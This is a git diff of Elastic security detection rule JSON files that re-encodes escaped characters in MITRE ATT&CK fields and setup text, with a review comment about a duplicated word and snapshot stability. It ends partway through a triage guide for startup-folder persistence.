ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json b/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json index 6003d37fed7..b7f67f8e538 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json 
@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json index 8789544fbba..45ec2213378 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json index 3186cd23e91..4a0dcef38bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json index c04e3f89f36..30d5fb7190a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json 
@@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json index b458c0edd42..e988e2ff29c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json index 21aa20db9de..b4552dbc40a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json index 67474d69a04..7890da4de63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json 
@@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json index 31b4db5c850..9f82f79bbbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json 
@@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json index 864f748a6fd..fd4b69e5053 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json 
@@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json index 5135df06696..dbc71e6a492 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json 
@@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json index ffed1b8e2c1..91a41249afe 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json 
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json
index b2cb39868d4..fd8ce23eb9e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json
index 5a29c407f4c..3c32882010f 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json
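Review bot: The new-side `setup` string in this hunk keeps the duplicated word in `Steps to implement the logging policy with with Advanced Audit Configuration:`, and the same text recurs in the `_106` through `_109` hunks that follow. These files look like versioned exports of one rule, so the wording fix presumably belongs in the rule's source definition with the export rerun, rather than a hand edit of each JSON snapshot. The `\u003e` to `>` and `\u0026` to `&` rewrites decode to identical strings under JSON, so no change in rule behaviour is expected from them; if older version snapshots such as `_105` through `_108` are meant to stay byte-stable for package consumers, re-encoding them is worth confirming against the package tooling.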
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json
index 7378d083e5a..87a76e70677 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json
index ebcbe46c4c7..623d0c7e31d 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json
index f3ae89be764..21e902ff8ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json
index 2d4a329ca85..bfa2b0c566d 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json
index 6d875c7a2fe..168c9ecc03a 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json
index 1f12374c343..a0ca41aa220 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json
index 296a8266fd5..703c28bb098 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json
index d7b2e1f7f2e..d4af282aa7c 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json
index fdcb4b4c2e8..7d2038da48e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json
index 52b3cba122b..8a1bbfe054b 100644
--- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the 
Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are 
identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
